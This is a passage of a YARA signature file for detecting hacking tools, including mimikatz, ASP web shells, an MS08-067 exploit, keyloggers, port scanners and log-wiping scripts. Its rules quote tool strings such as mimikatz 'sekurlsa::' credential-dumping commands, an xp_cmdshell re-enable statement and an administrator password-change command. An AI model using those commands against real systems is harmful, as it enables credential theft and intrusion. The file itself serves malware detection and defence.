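		reference = "https://github.com/g0tmi1k/exe2hex"
		date = "2016-01-15"
		score = 70
	strings:
		$a1 = "set /p \"=4d5a" ascii
		$a2 = "powershell -Command \"$hex=" ascii
		$b1 = "set+%2Fp+%22%3D4d5" ascii
		$b2 = "powershell+-Command+%22%24hex" ascii
		$c1 = "echo 4d 5a " ascii
		$c2 = "echo r cx >>" ascii
		$d1 = "echo+4d+5a+" ascii
		$d2 = "echo+r+cx+%3E%3E" ascii
	condition:
		all of ($a*) or all of ($b*) or all of ($c*) or all of ($d*)
}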
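rule Smartniff {
	// Detects the NirSoft SmartSniff binary (smsniff.exe) bundled in this tool
	// set. SmartSniff is a publicly available network-capture utility, so a hit
	// on an administrator or analyst workstation may be benign; correlate with
	// the user and the drop location before acting.
	meta:
		description = "Chinese Hacktool Set - file Smartniff.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "67609f21d54a57955d8fe6d48bc471f328748d0a"
	strings:
		$s1 = "smsniff.exe" fullword wide
		$s2 = "support@nirsoft.net0" fullword ascii
		$s3 = "</requestedPrivileges></security></trustInfo></assembly>" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 200KB and all of them
}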
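rule kappfree {
	// Detects the mimikatz "kappfree" module (AppLocker bypass DLL) by its
	// French banner strings and export name.
	meta:
		description = "Chinese Hacktool Set - file kappfree.dll"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "e57e79f190f8a24ca911e6c7e008743480c08553"
	strings:
		$s1 = "Bienvenue dans un processus distant" fullword wide
		$s2 = "kappfree.dll" fullword ascii
		$s3 = "kappfree de mimikatz pour Windows (anti AppLocker)" fullword wide
	condition:
		uint16(0) == 0x5a4d and filesize < 200KB and all of them
}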
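rule UnPack_rar_Folder_InjectT {
	// Detects the WinEggDrop "InjectT" service installer. The $x* strings
	// (registry key and binary name) are tool-specific; the $s* strings are
	// service-control usage text and common DLL names, so the condition
	// requires one $x plus three $s to avoid matching generic service helpers.
	meta:
		description = "Disclosed hacktool set (old stuff) - file InjectT.exe"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "80f39e77d4a34ecc6621ae0f4d5be7563ab27ea6"
	strings:
		$s0 = "%s -Install                          -->To Install The Service" fullword ascii
		$s1 = "Explorer.exe" fullword ascii
		$s2 = "%s -Start                            -->To Start The Service" fullword ascii
		$s3 = "%s -Stop                             -->To Stop The Service" fullword ascii
		$s4 = "The Port Is Out Of Range" fullword ascii
		$s7 = "Fail To Set The Port" fullword ascii
		$s11 = "\\psapi.dll" fullword ascii
		$s20 = "TInject.Dll" fullword ascii

		$x1 = "Software\\Microsoft\\Internet Explorer\\WinEggDropShell" fullword ascii
		$x2 = "injectt.exe" fullword ascii
	condition:
		( 1 of ($x*) ) and ( 3 of ($s*) )
}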
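rule Dos_Down64 {
	// Detects Down64.exe, the 64-bit sibling of Down32.exe, by its fixed
	// C:\Windows\Temp scratch paths, dropped executable name and .NET members.
	meta:
		description = "Chinese Hacktool Set - file Down64.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "43e455e43b49b953e17a5b885ffdcdf8b6b23226"
	strings:
		$s1 = "C:\\Windows\\Temp\\Down.txt" fullword wide
		$s2 = "C:\\Windows\\Temp\\Cmd.txt" fullword wide
		$s3 = "C:\\Windows\\Temp\\" fullword wide
		$s4 = "ProcessXElement" fullword ascii
		$s8 = "down.exe" fullword wide
		$s20 = "set_Timer1" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 150KB and all of them
}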
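rule Mimikatz_Memory_Rule_1 : APT {
	// Memory-scan rule for mimikatz: matches any of the sekurlsa:: module
	// command names. The original $s10 read "ekurlsa::minidump"; combined with
	// `fullword` that can never match the real "sekurlsa::minidump" token
	// (the preceding 's' is alphanumeric), so the string was dead. Fixed here.
	meta:
		author = "Florian Roth"
		date = "12/22/2014"
		score = 70
		type = "memory"
		description = "Detects password dumper mimikatz in memory"
	strings:
		$s1 = "sekurlsa::msv" fullword ascii
		$s2 = "sekurlsa::wdigest" fullword ascii
		$s4 = "sekurlsa::kerberos" fullword ascii
		$s5 = "sekurlsa::tspkg" fullword ascii
		$s6 = "sekurlsa::livessp" fullword ascii
		$s7 = "sekurlsa::ssp" fullword ascii
		$s8 = "sekurlsa::logonPasswords" fullword ascii
		$s9 = "sekurlsa::process" fullword ascii
		$s10 = "sekurlsa::minidump" fullword ascii
		$s11 = "sekurlsa::pth" fullword ascii
		$s12 = "sekurlsa::tickets" fullword ascii
		$s13 = "sekurlsa::ekeys" fullword ascii
		$s14 = "sekurlsa::dpapi" fullword ascii
		$s15 = "sekurlsa::credman" fullword ascii
	condition:
		1 of them
}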
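rule FPipe2_0 {
	// Detects Foundstone FPipe 2.0 (TCP port redirector) by its help text.
	// Dual-use administration tool; the interesting signal is where it runs.
	meta:
		description = "Disclosed hacktool set (old stuff) - file FPipe2.0.exe"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "891609db7a6787575641154e7aab7757e74d837b"
	strings:
		$s0 = "made to port 80 of the remote machine at 192.168.1.101 with the" fullword ascii
		$s1 = "Unable to resolve hostname \"%s\"" fullword ascii
		$s2 = " -s    - outbound connection source port number" fullword ascii
		$s3 = "source port for that outbound connection being set to 53 also." fullword ascii
		$s4 = "http://www.foundstone.com" fullword ascii
		$s19 = "FPipe" fullword ascii
	condition:
		all of them
}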
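rule Project1 {
	// Detects Project1.exe, which embeds an xp_cmdshell re-registration
	// statement for MS SQL Server alongside a password-list file name.
	// The 5000KB cap is generous; $s1 is the discriminating string.
	meta:
		description = "Chinese Hacktool Set - file Project1.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "d1a5e3b646a16a7fcccf03759bd0f96480111c96"
	strings:
		$s1 = "EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'" fullword ascii
		$s2 = "Password.txt" fullword ascii
		$s3 = "LoginPrompt" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 5000KB and all of them
}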
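rule Tools_termsrv {
	// Detects the termsrv.dll build shipped in this tool set. The strings are
	// Terminal Services internals, so a hit should be confirmed against the
	// legitimate system copy (signature and hash) before treating it as a
	// replaced or patched DLL.
	meta:
		description = "Chinese Hacktool Set - file termsrv.dll"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "294a693d252f8f4c85ad92ee8c618cebd94ef247"
	strings:
		$s1 = "Iv\\SmSsWinStationApiPort" fullword ascii
		$s2 = " TSInternetUser " fullword wide
		$s3 = "KvInterlockedCompareExchange" fullword ascii
		$s4 = " WINS/DNS " fullword wide
		$s5 = "winerror=%1" fullword wide
		$s6 = "TermService " fullword wide
	condition:
		uint16(0) == 0x5a4d and filesize < 1150KB and all of them
}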
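rule mysqlfast {
	// Detects the "MySql Hash Cracker" (mysqlfast.exe) by its banner, usage and
	// result messages. Four of six strings are required.
	meta:
		description = "Chinese Hacktool Set - file mysqlfast.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "32b60350390fe7024af7b4b8fbf50f13306c546f"
	strings:
		$s2 = "Invalid password hash: %s" fullword ascii
		$s3 = "-= MySql Hash Cracker =- " fullword ascii
		$s4 = "Usage: %s hash" fullword ascii
		$s5 = "Hash: %08lx%08lx" fullword ascii
		$s6 = "Found pass: " fullword ascii
		$s7 = "Pass not found" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 900KB and 4 of them
}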
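rule ByPassFireWall_zip_Folder_Ie {
	// Detects the Ie.dll firewall-bypass component. $s1/$s5/$s7 are stock
	// loader error messages found in many binaries; the developer's PDB-style
	// path in $s0 is what makes this rule specific, and `all of them` keeps
	// the generic strings from firing on their own.
	meta:
		description = "Disclosed hacktool set (old stuff) - file Ie.dll"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "d1b9058f16399e182c9b78314ad18b975d882131"
	strings:
		$s0 = "d:\\documents and settings\\loveengeng\\desktop\\source\\bypass\\lcc\\ie.dll" fullword ascii
		$s1 = "LOADER ERROR" fullword ascii
		$s5 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
		$s7 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii
	condition:
		all of them
}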
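rule aspbackdoor_asp1 {
	// Detects the asp1.txt script from the ASP backdoor set by its Access-DB
	// connection string, table/column names and query construction. The table
	// name (scjh) and variable list in $s10 carry the specificity.
	meta:
		description = "Disclosed hacktool set (old stuff) - file asp1.txt"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "9ef9f34392a673c64525fcd56449a9fb1d1f3c50"
	strings:
		$s0 = "param = \"driver={Microsoft Access Driver (*.mdb)}\" " fullword ascii
		$s1 = "conn.Open param & \";dbq=\" & Server.MapPath(\"scjh.mdb\") " fullword ascii
		$s6 = "set rs=conn.execute (sql)%> " fullword ascii
		$s7 = "<%set Conn = Server.CreateObject(\"ADODB.Connection\") " fullword ascii
		$s10 = "<%dim ktdh,scph,scts,jhqtsj,yhxdsj,yxj,rwbh " fullword ascii
		$s15 = "sql=\"select * from scjh\" " fullword ascii
	condition:
		all of them
}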
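rule HTTPSCANNER {
	// Detects HTTPSCANNER.EXE by its wide-string product/file name only.
	// Name-based rules like this are easy to evade by renaming and may
	// match unrelated tools that reuse the name; treat as low confidence.
	meta:
		description = "Chinese Hacktool Set - file HTTPSCANNER.EXE"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "ae2929346944c1ea3411a4562e9d5e2f765d088a"
	strings:
		$s1 = "HttpScanner.exe" fullword wide
		$s2 = "HttpScanner" fullword wide
	condition:
		uint16(0) == 0x5a4d and filesize < 3500KB and all of them
}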
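rule whosthere : Toolkit  {
	// Detects whosthere.exe from the Core Security Pass-The-Hash Toolkit by its
	// author banner, help text and LSASS/debug-privilege error messages.
	// Two of six strings suffice.
	meta:
		description = "Auto-generated rule - file whosthere.exe"
		author = "Florian Roth"
		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
		date = "2015-07-10"
		score = 80
		hash = "d7a82204d3e511cf5af58eabdd6e9757c5dd243f9aca3999dc0e5d1603b1fa37"
	strings:
		$s1 = "by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" fullword ascii /* PEStudio Blacklist: strings */ /* score: '48.00' */
		$s2 = "whosthere enters an infinite loop and searches for new logon sessions every 2 seconds. Only new sessions are shown if found." fullword ascii /* PEStudio Blacklist: strings */ /* score: '36.00' */
		$s3 = "specify addresses to use. Format: ADDCREDENTIAL_ADDR:ENCRYPTMEMORY_ADDR:FEEDBACK_ADDR:DESKEY_ADDR:LOGONSESSIONLIST_ADDR:LOGONSES" ascii /* PEStudio Blacklist: strings */ /* score: '28.00' */
		$s4 = "Could not enable debug privileges. You must run this tool with an account with administrator privileges." fullword ascii /* PEStudio Blacklist: strings */ /* score: '27.00' */
		$s5 = "-B is now used by default. Trying to find correct addresses.." fullword ascii /* PEStudio Blacklist: strings */ /* score: '15.00' */
		$s6 = "Cannot get LSASS.EXE PID!" fullword ascii /* score: '14.00' */
	condition:
		uint16(0) == 0x5a4d and filesize < 320KB and 2 of them
}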
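rule EditKeyLogReadMe {
	// Detects the WinEggDrop keylogger readme by the file names it references.
	// `3 of them` avoids firing on a lone generic name such as "nc.exe".
	meta:
		description = "Disclosed hacktool set (old stuff) - file EditKeyLogReadMe.txt"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "dfa90540b0e58346f4b6ea12e30c1404e15fbe5a"
	strings:
		$s0 = "editKeyLog.exe KeyLog.exe," fullword ascii
		$s1 = "WinEggDrop.DLL" fullword ascii
		$s2 = "nc.exe" fullword ascii
		$s3 = "KeyLog.exe" fullword ascii
		$s4 = "EditKeyLog.exe" fullword ascii
		$s5 = "wineggdrop" fullword ascii
	condition:
		3 of them
}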
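rule aspfile2 {
	// Detects the aspfile2.asp web shell by its command-result message, form
	// field for the command string and page title. All strings required.
	meta:
		description = "Disclosed hacktool set (old stuff) - file aspfile2.asp"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "14efbc6cb01b809ad75a535d32b9da4df517ff29"
	strings:
		$s0 = "response.write \"command completed success!\" " fullword ascii
		$s1 = "for each co in foditems " fullword ascii
		$s3 = "<input type=text name=text6 value=\"<%= szCMD6 %>\"><br> " fullword ascii
		$s19 = "<title>Hello! Welcome </title>" fullword ascii
	condition:
		all of them
}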
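rule MS08_067_Exploit_Hacktools_CN {
	// Detects the cs.exe MS08-067 exploit binary by its banner, SMB/RPC error
	// messages and author tag. Four of seven strings are required; a hit
	// indicates exploitation tooling for an old SMB vulnerability and should
	// prompt a patch-level check of the hosts it was pointed at.
	meta:
		description = "Disclosed hacktool set - file cs.exe"
		author = "Florian Roth"
		date = "17.11.14"
		score = 60
		hash = "a3e9e0655447494253a1a60dbc763d9661181322"
	strings:
		$s0 = "MS08-067 Exploit for CN by EMM@ph4nt0m.org" fullword ascii
		$s3 = "Make SMB Connection error:%d" fullword ascii
		$s5 = "Send Payload Over!" fullword ascii
		$s7 = "Maybe Patched!" fullword ascii
		$s8 = "RpcExceptionCode() = %u" fullword ascii
		$s11 = "ph4nt0m" fullword wide
		$s12 = "\\\\%s\\IPC" ascii
	condition:
		4 of them
}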
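rule NetBIOS_Name_Scanner {
	// yarGen rule for "NetBIOS Name Scanner.exe". $s0 and $s2 are resource /
	// compiler artifacts present in many Windows binaries; only $s4
	// ("NBTScanner!y&") is specific, so the rule is effectively a single-string
	// match despite `all of them`. Low confidence; hash matches the meta md5.
	meta:
		description = "Auto-generated rule on file NetBIOS Name Scanner.exe"
		author = "yarGen Yara Rule Generator by Florian Roth"
		hash = "888ba1d391e14c0a9c829f5a1964ca2c"
	strings:
		$s0 = "IconEx"
		$s2 = "soft Visual Stu"
		$s4 = "NBTScanner!y&"
	condition:
		all of them
}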
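rule _hscan_hscan_hscangui {
	// Super rule covering hscan.exe and hscangui.exe: shared log/report paths,
	// FTP and IPC null-session probe messages, and the scan summary format.
	meta:
		description = "Chinese Hacktool Set - from files hscan.exe, hscan.exe, hscangui.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		super_rule = 1
		hash0 = "17a743e40790985ececf5c66eaad2a1f8c4cffe8"
		hash1 = "568b06696ea0270ee1a744a5ac16418c8dacde1c"
		hash2 = "af8aced0a78e1181f4c307c78402481a589f8d07"
	strings:
		$s1 = ".\\log\\Hscan.log" fullword ascii
		$s2 = ".\\report\\%s-%s.html" fullword ascii
		$s3 = "[%s]: checking \"FTP account: ftp/ftp@ftp.net\" ..." fullword ascii
		$s4 = "[%s]: IPC NULL session connection success !!!" fullword ascii
		$s5 = "Scan %d targets,use %4.1f minutes" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 240KB and all of them
}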
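rule Jc_WinEggDrop_Shell {
	// Detects the WinEggDrop Shell command reference (a text file) by its
	// documented command strings. Two of seven strings are required.
	meta:
		description = "Disclosed hacktool set (old stuff) - file Jc.WinEggDrop Shell.txt"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "820674b59f32f2cf72df50ba4411d7132d863ad2"
	strings:
		$s0 = "Sniffer.dll" fullword ascii
		$s4 = ":Execute net.exe user Administrator pass" fullword ascii
		$s5 = "Fport.exe or mport.exe " fullword ascii
		$s6 = ":Password Sniffering Is Running |Not Running " fullword ascii
		$s9 = ": The Terminal Service Port Has Been Set To NewPort" fullword ascii
		$s15 = ": Del www.exe                   " fullword ascii
		$s20 = ":Dir *.exe                    " fullword ascii
	condition:
		2 of them
}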
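rule HScan_v1_20_PipeCmd {
	// Detects PipeCmd.exe, a remote-command helper that copies a service
	// executable to ADMIN$\System32 and talks to it over a named pipe (see
	// $s1, $s4-$s6). Four of nine strings are required. Hits usually warrant
	// a look at service-installation events (System log 7045) on the target.
	meta:
		description = "Chinese Hacktool Set - file PipeCmd.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "64403ce63b28b544646a30da3be2f395788542d6"
	strings:
		$s1 = "%SystemRoot%\\system32\\PipeCmdSrv.exe" fullword ascii
		$s2 = "PipeCmd.exe" fullword wide
		$s3 = "Please Use NTCmd.exe Run This Program." fullword ascii
		$s4 = "%s\\pipe\\%s%s%d" fullword ascii
		$s5 = "\\\\.\\pipe\\%s%s%d" fullword ascii
		$s6 = "%s\\ADMIN$\\System32\\%s%s" fullword ascii
		$s7 = "This is a service executable! Couldn't start directly." fullword ascii
		$s8 = "Connecting to Remote Server ...Failed" fullword ascii
		$s9 = "PIPECMDSRV" fullword wide
	condition:
		uint16(0) == 0x5a4d and filesize < 200KB and 4 of them
}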
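rule CN_Portscan : APT
{
	// Detects a port scanner by a single embedded connection-log string.
	// `$s1 at 0` is just the MZ header check (equivalent to
	// uint16(0) == 0x5a4d), so $s2 alone carries the detection.
	meta:
		description = "CN Port Scanner"
		author = "Florian Roth"
		release_date = "2013-11-29"
		confidential = false
		score = 70
	strings:
		$s1 = "MZ"
		$s2 = "TCP 12.12.12.12"
	condition:
		($s1 at 0) and $s2
}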
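rule Hacktools_CN_Panda_445TOOL {
	// Detects the 445TOOL.rar archive by the member file names stored in its
	// headers. Individually these names are generic; `all of them` is required.
	meta:
		description = "Disclosed hacktool set - file 445TOOL.rar"
		author = "Florian Roth"
		date = "17.11.14"
		score = 60
		hash = "92050ba43029f914696289598cf3b18e34457a11"
	strings:
		$s0 = "scan.bat" fullword ascii
		$s1 = "Http.exe" fullword ascii
		$s2 = "GOGOGO.bat" fullword ascii
		$s3 = "ip.txt" fullword ascii
	condition:
		all of them
}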
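rule CGISscan_CGIScan {
	// yarGen rule for CGIScan.exe. $s2 and $s3 are messages from a common
	// Delphi socket library and can appear in unrelated Delphi programs;
	// the vendor string $s1 narrows it. All strings required.
	meta:
		description = "Auto-generated rule on file CGIScan.exe"
		author = "yarGen Yara Rule Generator by Florian Roth"
		hash = "338820e4e8e7c943074d5a5bc832458a"
	strings:
		$s1 = "Wang Products" fullword wide
		$s2 = "WSocketResolveHost: Cannot convert host address '%s'"
		$s3 = "tcp is the only protocol supported thru socks server"
	condition:
		all of ($s*)
}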
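rule aspbackdoor_ipclear {
	// Detects ipclear.vbs, a script that rewrites IIS (w3svc) log files to
	// remove entries for a given IP — an anti-forensic log-tampering tool.
	// A hit should trigger verification of IIS log integrity for the period.
	meta:
		description = "Disclosed hacktool set (old stuff) - file ipclear.vbs"
		author = "Florian Roth"
		date = "23.11.14"
		score = 60
		hash = "9f8fdfde4b729516330eaeb9141fb2a7ff7d0098"
	strings:
		$s0 = "Set ServiceObj = GetObject(\"WinNT://\" & objNet.ComputerName & \"/w3svc\")" fullword ascii
		$s1 = "wscript.Echo \"USAGE:KillLog.vbs LogFileName YourIP.\"" fullword ascii
		$s2 = "Set txtStreamOut = fso.OpenTextFile(destfile, ForWriting, True)" fullword ascii
		$s3 = "Set objNet = WScript.CreateObject( \"WScript.Network\" )" fullword ascii
		$s4 = "Set fso = CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
	condition:
		all of them
}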
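rule XScanLib {
	// Detects the X-Scan plugin library (XScanLib.dll) by its module name and
	// port-check plugin identifiers.
	meta:
		description = "Chinese Hacktool Set - file XScanLib.dll"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "c5cb4f75cf241f5a9aea324783193433a42a13b0"
	strings:
		$s4 = "XScanLib.dll" fullword ascii
		$s6 = "Ports/%s/%d" fullword ascii
		$s8 = "DEFAULT-TCP-PORT" fullword ascii
		$s9 = "PlugCheckTcpPort" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 360KB and all of them
}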
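rule CN_Hacktool_BAT_PortsOpen {
	// Detects a batch script that correlates `netstat -ano` output with
	// `tasklist` to map listening TCP ports to processes. The same idiom is
	// used in legitimate admin scripts, so confirm provenance before acting.
	meta:
		description = "Detects a chinese BAT hacktool for local port evaluation"
		author = "Florian Roth"
		score = 60
		date = "12.10.2014"
	strings:
		$s0 = "for /f \"skip=4 tokens=2,5\" %%a in ('netstat -ano -p TCP') do (" ascii
		$s1 = "in ('tasklist /fi \"PID eq %%b\" /FO CSV') do " ascii
		$s2 = "@echo off" ascii
	condition:
		all of them
}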
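rule OracleScan {
	// Detects the Delphi-built OracleScan.exe by the author's blog URL,
	// Delphi RTL path and query-related identifiers. All strings required.
	meta:
		description = "Chinese Hacktool Set - file OracleScan.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "10ff7faf72fe6da8f05526367b3522a2408999ec"
	strings:
		$s1 = "MYBLOG:HTTP://HI.BAIDU.COM/0X24Q" fullword ascii
		$s2 = "\\Borland\\Delphi\\RTL" fullword ascii
		$s3 = "USER_NAME" ascii
		$s4 = "FROMWWHERE" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 300KB and all of them
}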
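rule ms10048_x86 {
	// Detects the MS10-048 (win32k) local privilege-escalation exploit by its
	// progress/status messages and author tag. Four of six strings required.
	meta:
		description = "Chinese Hacktool Set - file ms10048-x86.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "e57b453966e4827e2effa4e153f2923e7d058702"
	strings:
		$s1 = "[ ] Resolving PsLookupProcessByProcessId" fullword ascii
		$s2 = "The target is most likely patched." fullword ascii
		$s3 = "Dojibiron by Ronald Huizer, (c) master@h4cker.us ." fullword ascii
		$s4 = "[ ] Creating evil window" fullword ascii
		$s5 = "%sHANDLEF_INDESTROY" fullword ascii
		$s6 = "[+] Set to %d exploit half succeeded" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 100KB and 4 of them
}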
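rule Generate {
	// Detects Generate.exe, which embeds an FTP-server implementation (530
	// login prompt, password-wait state) and a "_Shell.exe" output name.
	// $s2 is a truncated resource string, hence no `fullword`.
	meta:
		description = "Chinese Hacktool Set - file Generate.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "2cb4c3916271868c30c7b4598da697f59e9c7a12"
	strings:
		$s1 = "C:\\TEMP\\" fullword ascii
		$s2 = "Connection Closed Gracefully.;Could not bind socket. Address and port are alread" wide
		$s3 = "$530 Please login with USER and PASS." fullword ascii
		$s4 = "_Shell.exe" fullword ascii
		$s5 = "ftpcWaitingPassword" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 2000KB and 3 of them
}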
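rule CN_Hacktool_ScanPort_Portscanner {
	// Detects the "ScanPort" port scanner by its wide product name and vendor
	// site. All strings required.
	meta:
		description = "Detects a chinese Portscanner named ScanPort"
		author = "Florian Roth"
		score = 70
		date = "12.10.2014"
	strings:
		$s0 = "LScanPort" fullword wide
		$s1 = "LScanPort Microsoft" fullword wide
		$s2 = "www.yupsoft.com" fullword wide
	condition:
		all of them
}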
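rule xscan_gui {
	// Detects the X-Scan GUI front end by its worker command line, plugin
	// description path and thread-status format string.
	meta:
		description = "Chinese Hacktool Set - file xscan_gui.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "a9e900510396192eb2ba4fb7b0ef786513f9b5ab"
	strings:
		$s1 = "%s -mutex %s -host %s -index %d -config \"%s\"" fullword ascii
		$s2 = "www.target.com" fullword ascii
		$s3 = "%s\\scripts\\desc\\%s.desc" fullword ascii
		$s4 = "%c Active/Maximum host thread: %d/%d, Current/Maximum thread: %d/%d, Time(s): %l" ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 3000KB and all of them
}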
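rule Mimikatz_Logfile
{
	// Detects mimikatz console output saved to disk (e.g. a redirected
	// sekurlsa dump) by its fixed column labels. All four labels are
	// required, which keeps ordinary documents from matching. Finding such
	// a file implies credentials were already extracted on that host.
	meta:
		description = "Detects a log file generated by malicious hack tool mimikatz"
		author = "Florian Roth"
		score = 80
		date = "2015/03/31"
		reference = "https://github.com/Neo23x0/Loki/blob/master/signatures/thor-hacktools.yar"
	strings:
		$s1 = "SID               :" ascii fullword
		$s2 = "* NTLM     :" ascii fullword
		$s3 = "Authentication Id :" ascii fullword
		$s4 = "wdigest :" ascii fullword
	condition:
		all of them
}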
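rule Dos_fp {
	// Detects the fp.exe build of Foundstone FPipe by its usage example, file
	// name, vendor URL and bind-error message. Dual-use port redirector.
	meta:
		description = "Chinese Hacktool Set - file fp.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "41d57d356098ff55fe0e1f0bcaa9317df5a2a45c"
	strings:
		$s1 = "fpipe -l 53 -s 53 -r 80 192.168.1.101" fullword ascii
		$s2 = "FPipe.exe" fullword wide
		$s3 = "http://www.foundstone.com" fullword ascii
		$s4 = "%s %s port %d. Address is already in use" fullword ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 65KB and all of them
}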
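rule OSEditor {
	// Detects OSEditor.exe ("OSC Editor") by its file/product names. $s4
	// ("GIF89") and $s5 ("Unlock") are common; they only add weight because
	// `all of them` is required together with the name strings.
	meta:
		description = "Chinese Hacktool Set - file OSEditor.exe"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "6773c3c6575cf9cfedbb772f3476bb999d09403d"
	strings:
		$s1 = "OSEditor.exe" fullword wide
		$s2 = "netsafe" wide
		$s3 = "OSC Editor" fullword wide
		$s4 = "GIF89" ascii
		$s5 = "Unlock" ascii
	condition:
		uint16(0) == 0x5a4d and filesize < 100KB and all of them
}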
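rule x64_klock {
	// Detects the mimikatz "klock" module (klock.dll) by its French banner and
	// desktop-error strings. All strings required.
	meta:
		description = "Chinese Hacktool Set - file klock.dll"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		hash = "44825e848bc3abdb6f31d0a49725bb6f498e9ccc"
	strings:
		$s1 = "Bienvenue dans un processus distant" fullword wide
		$s2 = "klock.dll" fullword ascii
		$s3 = "Erreur : le bureau courant (" fullword wide
		$s4 = "klock de mimikatz pour Windows" fullword wide
	condition:
		uint16(0) == 0x5a4d and filesize < 907KB and all of them
}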
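rule kiwi_tools_gentil_kiwi {
	// Super rule for the mimikatz 1.x tool family: matches the "mimikatz" name
	// together with the Gentil Kiwi copyright strings in version resources.
	// Covers the main executable and its helper DLLs/EXEs listed below.
	meta:
		description = "Chinese Hacktool Set - from files kappfree.dll, kelloworld.dll, KiwiCmd.exe, KiwiRegedit.exe, KiwiTaskmgr.exe, klock.dll, mimikatz.exe, sekurlsa.dll, kappfree.dll, kelloworld.dll, KiwiCmd.exe, KiwiRegedit.exe, KiwiTaskmgr.exe, klock.dll, mimikatz.exe, sekurlsa.dll"
		author = "Florian Roth"
		reference = "http://tools.zjqhr.com/"
		date = "2015-06-13"
		super_rule = 1
		hash0 = "e57e79f190f8a24ca911e6c7e008743480c08553"
		hash1 = "55d5dabd96c44d16e41f70f0357cba1dda26c24f"
		hash2 = "7ac7541e20af7755b7d8141c5c1b7432465cabd8"
		hash3 = "9fbfe3eb49d67347ab57ae743f7542864bc06de6"
		hash4 = "5c90d648c414bdafb549291f95fe6f27c0c9b5ec"
		hash5 = "7addce4434670927c4efaa560524680ba2871d17"
		hash6 = "28c5c0bdb7786dc2771672a2c275be7d9b742ec7"
		hash7 = "6acecd18fc7da1c5eb0d04e848aae9ce59d2b1b5"
		hash8 = "5d578df9a71670aa832d1cd63379e6162564fb6b"
		hash9 = "febadc01a64a071816eac61a85418711debaf233"
		hash10 = "569ca4ff1a5ea537aefac4a04a2c588c566c6d86"
		hash11 = "56a61c808b311e2225849d195bbeb69733efe49a"
		hash12 = "8bd6c9f2e8be3e74bd83c6a2d929f8a69422fb16"
		hash13 = "44825e848bc3abdb6f31d0a49725bb6f498e9ccc"
		hash14 = "f661d6516d081c37ab7da0f4ec21b2cc6a9257c6"
		hash15 = "6e0ffa472d63fdda5abc4c1b164ba8724dcb25b5"
	strings:
		$s1 = "mimikatz" fullword wide
		$s2 = "Copyright (C) 2012 Gentil Kiwi" fullword wide
		$s3 = "Gentil Kiwi" fullword wide
	condition:
		uint16(0) == 0x5a4d and filesize < 1000KB and all of them
}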
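rule Hacktools_CN_Burst_Thecard {
	// Detects the Thecard.bat launcher script: a loop that keeps Clear.bat
	// running, a ping-based sleep and a console-size setting. Individually
	// these are common batch idioms; `all of them` plus the URL in $s1 make
	// the rule specific.
	meta:
		description = "Disclosed hacktool set - file Thecard.bat"
		author = "Florian Roth"
		date = "17.11.14"
		score = 60
		hash = "50b01ea0bfa5ded855b19b024d39a3d632bacb4c"
	strings:
		$s0 = "tasklist |find \"Clear.bat\"||start Clear.bat" fullword ascii
		$s1 = "Http://www.coffeewl.com" fullword ascii
		$s2 = "ping -n 2 localhost 1>nul 2>nul" fullword ascii
		$s3 = "for /L %%a in (" fullword ascii
		$s4 = "MODE con: COLS=42 lines=5" fullword ascii
	condition:
		all of them
}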
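rule iKAT_startbar {
	// Detects startbar.exe from the iKAT kiosk-escape set. Every string looks
	// like a field of the embedded Authenticode certificate (publisher name,
	// address, issuer), not program logic — so any binary signed with the
	// same Shinysoft certificate would also match. Verify the hit against the
	// tool's hash before escalating.
	meta:
		description = "Tool to hide unhide the windows startbar from command line - iKAT hack tools - file startbar.exe"
		author = "Florian Roth"
		date = "05.11.14"
		score = 50
		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
		hash = "0cac59b80b5427a8780168e1b85c540efffaf74f"
	strings:
		$s2 = "Shinysoft Limited1" fullword ascii
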